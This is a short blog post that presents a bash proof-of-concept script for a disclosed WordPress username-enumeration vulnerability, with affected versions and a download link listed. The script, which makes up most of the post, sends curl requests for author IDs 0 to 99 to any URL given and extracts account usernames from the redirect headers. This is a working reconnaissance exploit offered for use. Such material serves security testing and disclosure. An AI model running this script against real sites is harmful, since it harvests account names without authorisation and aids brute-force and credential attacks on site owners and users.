WordPress User Enumeration PoC Shell Script

We have recently seen WordPress User name enumeration Vulnerability disclosure here http://seclists.org/fulldisclosure/2011/May/493

Versions Effected are : 2.6, 3.1, 3.1.1, 3.1.3

Here i am enclosing a simple PoC which could be run on Bash Shell.
(Note : PoC on python is already available for those who are curious)

#!/bin/bash
# WordPress User Enumeration PoC by Anant Shrivastava
# Disclosure : http://seclists.org/fulldisclosure/2011/May/493
# License : GPLv2
# License URL : http://www.gnu.org/licenses/gpl-2.0.html
if [ $# -ne 1 ]
then
    echo "Wordpress username enumeration PoC"
    echo "based on disclosure @ : http://seclists.org/fulldisclosure/2011/May/493 "
    echo $0 "URL of Website"
else
    count=0
    title=0
    while [ $count -lt 100 ]
    do
        result=`curl -I -s --max-time 30 --max-filesize 1 $1?author=$count | grep -F 'Location:'`
        name=`echo $result |  rev | cut -f2 -d"/" | rev`
        nm=`echo "$"$result`
        if [ "$nm" != "$" ]
        then
            if [ $title == 0 ]
            then
                echo "ID : UserName"
                title=1
            fi
            echo -n $count " : "
            echo $name
        fi
        count=`expr $count + 1`
    done
    if [ $title == 0 ]
    then
        echo "Either this site is not vulnerable or is not using wordpress hosted"
    fi
fi

Code could be download from here : https://github.com/anantshri/script-collection/blob/master/wp-user-enum.sh

Do you like what you read, What to share it

One Reply to “WordPress User Enumeration PoC Shell Script”

Leave a Reply

Your email address will not be published. Required fields are marked *